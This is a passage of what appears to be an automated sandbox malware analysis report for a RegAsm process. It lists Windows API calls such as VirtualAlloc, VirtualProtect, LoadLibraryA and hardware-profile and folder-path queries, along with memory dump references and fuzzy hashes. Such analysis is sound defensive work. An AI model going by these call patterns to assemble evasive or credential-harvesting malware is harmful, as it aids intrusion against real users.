                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 0041086E: _EH_prolog.MSVCRT ref: 00410873
                                                                                                                                                                                                                                                                • Part of subcall function 00406492: _EH_prolog.MSVCRT ref: 00406497
                                                                                                                                                                                                                                                                • Part of subcall function 00406492: GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00423B74,?,?,?,00423B6F,00000000), ref: 00406554
                                                                                                                                                                                                                                                                • Part of subcall function 00406492: SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00423B78,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00423B73), ref: 004065CC
                                                                                                                                                                                                                                                                • Part of subcall function 00406492: LoadLibraryA.KERNEL32(00000000), ref: 004065E7
                                                                                                                                                                                                                                                                • Part of subcall function 004093C1: _EH_prolog.MSVCRT ref: 004093C6
                                                                                                                                                                                                                                                                • Part of subcall function 004093C1: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00423DD4,?,?,00423BD2,00000000), ref: 00409443
                                                                                                                                                                                                                                                                • Part of subcall function 004093C1: StrCmpCA.SHLWAPI(?,00423DD8), ref: 00409460
                                                                                                                                                                                                                                                                • Part of subcall function 004093C1: StrCmpCA.SHLWAPI(?,00423DDC), ref: 0040947A
                                                                                                                                                                                                                                                                • Part of subcall function 004093C1: StrCmpCA.SHLWAPI(?,00000000,?,?,?,00423DE0,?,?,00423BD3), ref: 00409511
                                                                                                                                                                                                                                                                • Part of subcall function 004066E4: FreeLibrary.KERNEL32(0040A9FA), ref: 004066EA
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpy$EnvironmentFileLibraryVariablelstrcat$AttributesFindFirstFolderFreeLoadPathlstrlen
                                                                                                                                                                                                                                                              • String ID: \..\
                                                                                                                                                                                                                                                              • API String ID: 2661990186-4220915743
                                                                                                                                                                                                                                                              • Opcode ID: 1baf731be5b712a8ee8592cc46acfd217d529db47b52e023e3d5594b4343f22a
                                                                                                                                                                                                                                                              • Instruction ID: c9b8218839ee67037faa05465a27bbd49f7b352c94817c32eda783aedc932c4c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1baf731be5b712a8ee8592cc46acfd217d529db47b52e023e3d5594b4343f22a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E616F71C01248EACB05FBE6C546BDDBFB86F18308F14446EE845732C2EB785718C6AA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E75), ref: 00405DC5
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 544645111-3916222277
                                                                                                                                                                                                                                                              • Opcode ID: a9ca3820c71c3eda37ba079eb7877add819211e6f4f865b059153334e2d250ef
                                                                                                                                                                                                                                                              • Instruction ID: cee62a71552f9d0dad0b6714305bc6c0a244a081a93a829b40d8518b33be5322
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9ca3820c71c3eda37ba079eb7877add819211e6f4f865b059153334e2d250ef
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D115B7150190AEBEB60CF9485487ABB6A5FF04340F6084279942E22C0C7789A41DF69
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                              • String ID: O<B
                                                                                                                                                                                                                                                              • API String ID: 1699248803-1873169068
                                                                                                                                                                                                                                                              • Opcode ID: 8cf3e5411f5412c3d29d0bc09b79c54d7594f1da92bb46549c9b8e78b8a74386
                                                                                                                                                                                                                                                              • Instruction ID: 45e6c66cee0d393bbb3ccfbecb5adc22dc475a6df9d0c134277c29a1610a0002
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8cf3e5411f5412c3d29d0bc09b79c54d7594f1da92bb46549c9b8e78b8a74386
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22F01CB590014CABDB11DF64C8909EDB7FDEBC8700F10C5AAA90593280D6309F469B50
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • failed memory resize %u to %u bytes, xrefs: 19850558
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                                                              • API String ID: 0-2134078882
                                                                                                                                                                                                                                                              • Opcode ID: 013405a90d9c1c101959d51affe6ac69b5a30b0c04e1acf3a669d5ecc46b0fda
                                                                                                                                                                                                                                                              • Instruction ID: 57f863c68dba2d814fffe90240626780ab2fcf9cda856e53b87cfa571cac23fa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 013405a90d9c1c101959d51affe6ac69b5a30b0c04e1acf3a669d5ecc46b0fda
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6CD02BB6D0C1207FD7012B58EC0198A77519B50531F8CC52CFC5C15250D2329DA4D3D3
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCurrentHwProfileA.ADVAPI32(?), ref: 0040EF97
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentProfile
                                                                                                                                                                                                                                                              • String ID: Unknown
                                                                                                                                                                                                                                                              • API String ID: 2104809126-1654365787
                                                                                                                                                                                                                                                              • Opcode ID: 6a5c29231768e02ec54d7e71c5f3ded4356e949e652b53887adf4e8dc1d825f2
                                                                                                                                                                                                                                                              • Instruction ID: dcaad79bc021bc7f3acda73ba1a55b24e0372051eba70068b5ae00655755aee4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a5c29231768e02ec54d7e71c5f3ded4356e949e652b53887adf4e8dc1d825f2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76E0EC71A0010AEBDB10DBA6E845FA977ACAB04348F54846AF801A7281DA78D519DB69
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • failed to allocate %u bytes of memory, xrefs: 198504E7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                                                                              • API String ID: 0-1168259600
                                                                                                                                                                                                                                                              • Opcode ID: cbceb9a7da2e4e61cbcfc2c883362ff9328dc56e9a90943f0233ac4e995e9e9b
                                                                                                                                                                                                                                                              • Instruction ID: 208136dc43d40ce3e9ac494656025859e9e98160dc9e786f7e47e1f2ec2cc232
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cbceb9a7da2e4e61cbcfc2c883362ff9328dc56e9a90943f0233ac4e995e9e9b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84D01266D8C23263D6111698FC05ECB7D515FA09A1F8D803CFD4C59360D555ADD5C3D2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040F764
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AttributesFileH_prolog
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3244726999-0
                                                                                                                                                                                                                                                              • Opcode ID: 6f00de53327e1575e3fd9b3adeca56bb0ef3e21a75ba924ab05cb97eefee5d2f
                                                                                                                                                                                                                                                              • Instruction ID: bf31c61f93718621c586fb5ee84d7f60d8da8a4487b707c6ecbf40584ea00f83
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f00de53327e1575e3fd9b3adeca56bb0ef3e21a75ba924ab05cb97eefee5d2f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88E09271900514ABCB14EFA9D8411DD7720EF057A4F50CA3FFC22B36D0DB389A068689
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E32,00000000,00000000), ref: 00405A8F
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E32,00000000,00000000), ref: 00405ABB
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                                                              • Opcode ID: 13952f3c5282676e9fff2e4139e34abb68a3afbd7b4b0673f58908b5c203bd9e
                                                                                                                                                                                                                                                              • Instruction ID: e70a3417a4082e47c5cc675eccf9baa03e5a1765de93523d1ed94c5c1dee212e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13952f3c5282676e9fff2e4139e34abb68a3afbd7b4b0673f58908b5c203bd9e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1218E71700B059BC724CFB4CD85BABB7F5EB40714F24492AE51AE7290D279AD40CF18
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040CA64
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 0040B8F5: _EH_prolog.MSVCRT ref: 0040B8FA
                                                                                                                                                                                                                                                                • Part of subcall function 0040B8F5: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B94D
                                                                                                                                                                                                                                                                • Part of subcall function 0040B8F5: memcmp.MSVCRT ref: 0040B98B
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2375657845-0
                                                                                                                                                                                                                                                              • Opcode ID: d9a798d28cd2138f77fc422e80fc9cc8b495af648d1b15e7bf36eb69f3db8c61
                                                                                                                                                                                                                                                              • Instruction ID: 309d288b9ccc134c4f2c4fad64900418b064d3a2b89e9a0470d2305c40c458cb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9a798d28cd2138f77fc422e80fc9cc8b495af648d1b15e7bf36eb69f3db8c61
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D915371C04248EADF01EBE6C946ADEBFB8AF15304F14456EE805732C2DB786718C766
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
